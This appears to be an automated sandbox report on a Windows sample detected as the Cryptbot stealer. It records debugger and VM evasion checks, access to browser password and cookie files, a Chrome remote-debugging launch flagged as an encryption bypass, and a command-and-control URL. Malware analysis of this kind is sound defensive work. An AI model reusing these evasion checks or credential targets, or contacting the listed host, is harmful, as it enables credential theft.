Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0B83 second address: 79B0B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 161CD98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 161A156 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 184846A instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1314 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1663 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1242 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1863 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8136 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 3068 Thread sleep time: -74037s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 764 Thread sleep time: -90045s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3328 Thread sleep time: -2629314s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5956 Thread sleep time: -3327663s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4960 Thread sleep time: -2485242s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7668 Thread sleep count: 1863 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7668 Thread sleep time: -186300s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7668 Thread sleep count: 8136 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7668 Thread sleep time: -813600s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.1712686282.0000000007221000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#'
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2118396257.0000018374427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00058230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00058230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_0005116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_0005116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00051160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00051160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_000511A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_000511A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_000513C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_000513C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1F84D0 cpuid 8_2_6C1F84D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.service123.exe.6c170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7664, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Leaks process information
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 141.8.197.146:80
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565525 Sample: file.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 7 other signatures 2->56 7 file.exe 3 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 40 home.fvtekx5pt.top 141.8.197.146, 49731, 49732, 49739 SPRINTHOSTRU Russian Federation 7->40 42 httpbin.org 18.208.8.205, 443, 49730 AMAZON-AESUS United States 7->42 44 2 other IPs or domains 7->44 36 C:\Users\user\AppData\...\service123.exe, PE32 7->36 dropped 38 C:\Users\user\...\rnCMinwLHbrEjcomyVjl.dll, PE32 7->38 dropped 62 Attempt to bypass Chrome Application-Bound Encryption 7->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->66 68 8 other signatures 7->68 18 service123.exe 7->18         started        21 WerFault.exe 21 16 7->21         started        24 chrome.exe 7->24         started        27 schtasks.exe 1 7->27         started        file5 signatures6 process7 dnsIp8 58 Found evasive API chain (may stop execution after checking mutex) 18->58 60 Found stalling execution ending in API Sleep call 18->60 34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->34 dropped 46 239.255.255.250 unknown Reserved 24->46 29 chrome.exe 24->29         started        32 conhost.exe 27->32         started        file9 signatures10 process11 dnsIp12 48 www.google.com 142.250.181.100, 443, 49749 GOOGLEUS United States 29->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
18.208.8.205
 httpbin.org United States
14618 AMAZON-AESUS false
239.255.255.250
 unknown Reserved
unknown unknown false
141.8.197.146
 fvtekx5pt.top Russian Federation
35278 SPRINTHOSTRU false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
fvtekx5pt.top 141.8.197.146 true
www.google.com 142.250.181.100 true
httpbin.org 18.208.8.205 true
home.fvtekx5pt.top 141.8.197.146 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekx5pt.top/RrlNvinfLqYZQoxgChZr1732768478 false
    		high